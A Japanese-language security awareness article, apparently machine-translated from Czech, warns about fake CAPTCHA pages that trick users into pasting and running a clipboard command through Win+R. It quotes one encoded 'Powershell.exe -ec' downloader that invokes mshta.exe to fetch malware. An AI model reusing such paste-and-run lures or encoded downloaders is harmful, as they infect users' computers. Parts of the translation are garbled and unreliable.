1738057007
2025-01-28 07:45:00
Captchaは開発できるように開発できます ロボットを克服します。テキストの単純なコピーから、スライダーをドラッグしたり、パズルを折り畳んだり、オブジェクトを回したりするポイントに到達しました。キャプチャだが Win+Rを押してコードを挿入することをお勧めします。。
偽のcaptchaは、セキュリティ講師が指摘したようにマルウェアを配布します デビッド・クドルナ。 IT部門はまた、1月の不正検査を指摘しました オハイオ州立大学また対処されました 所得 またはフォーラム MalwareBytes。
詐欺的なキャプテの例を見てみましょう。 Googleの視覚スタイルを模倣しますあなたを混乱させるために。あなたがロボットではないことを確認するために、4つのステップを踏むことを望んでいます。
- Win+Rキーを押し続けます。
- 検証ウィンドウでCtrl+Vを押します。
- キーボードのENTERを押します。
- [確認]をクリックします。
コンピューターの初心者や初心者にランク付けされていない場合、あなたは確かに正しいCaptchaが原則としてだと思うでしょう 多くの手動アクションを必要とすることはできません そしてまったく 外部プログラムでの作業を必要とすることはできません。
tldr
False Captchaは、マルウェアダウンロードスクリプトにコピーします。ダイアログを開き、スクリプトとvoilaを挿入するように導きます。コンピューターは、しばらくして悪意のあるコードが感染します。
疑わしい検証ウィンドウは対話です 走るコンピューターにプログラムが起動または開いたフォルダーを開始する長いWindowsコンポーネント。柔軟です。 Webアドレスを挿入すると、デフォルトのブラウザで開きます。パラメーターでプログラムを開始することもできます。 PowerShellコマンドラインの場合、スクリプトを開始します。詐欺師はこの特性を使用します。
さらに、キーボードショートカットCTRL+Vがクリップボードからコンテンツを挿入することをご存知でしょう。しかし、クリップボードに何もコピーしないだけで、ダイアログに何を置くべきですか?もちろんあなた 何かがクリップボードにコピーされました。 Redditの数ヶ月の場合、それは次のとおりでした:
Powershell.exe -ec bqbzaggadabhacaaigboahqadabwahmaogavac8aywbsagkaywbrahqabwbnag8algbjagwaaqbjagsalwbkag8adwbuagwabwbhagqavahqavahqawadgaiga =
これは、Base64形式でエンコードされた一連の文字があるコマンドです。たとえば、アドレスに装飾ツールが存在します www.base64decode.org。デコード後に明確です。
小野 -ec 彼は、エンコードされたスクリプトを開始するためにPowershellを言います。彼はプログラムを順番に開始します mshta.exe。これも長いWindowsコンポーネントであり、HTMLアプリケーションの操作に使用されます(HTA、IE Microsoft HTMLアプリケーション)。 HTAファイルを実行するだけでなく、攻撃エンティティはMSHTA.exeを悪用してスクリプトを下げることさえできます。
この場合、Mshta.exeはそうします 挿入されたアドレスから何でもダウンロードしましたそれは今では非アクティブです。 おそらくマルウェアでしょう。アドレスは一見疑われています。クリップボードに挿入された文字列が終了しないまで、これは検出されません。エンコードされた文字列自体は自信を引き起こしません。
特に、より深いレベルでコンピューターで働いていない人は脆弱です。述べたように オハイオ州立大学誤ったキャプチャはこれまでに 合法的なWebサイトにあります。通常、広告システムを介して。
captchaはユーザー-Annoyingであり、そのソリューションは毎年人間性を犠牲にします 多くの時間。最近の調査によると 働いていません。その間、私たちは検証に興味をそそられました あなたは運命で3人のモンスターを殺します。もちろん、これはむしろ逸話的な問題です。発明されたキャプチャを排除する本当の方法 りんご または グーグル。人類の検証は、今日まで私たちと一緒にいます。
リソース: David Kudrna #cyber #ai🚀 / x | OTDI /オハイオ州立大学 | soko90909 / reddit | マカフィー | 中くらい | Miter Corporation | マカフィー | 赤いカナリア | サイベロン | MalwareBytesフォーラム
#WinRCtrlVコンピューターにマルウェアを入力して入力します偽のcaptchaに注意してください #živě.cz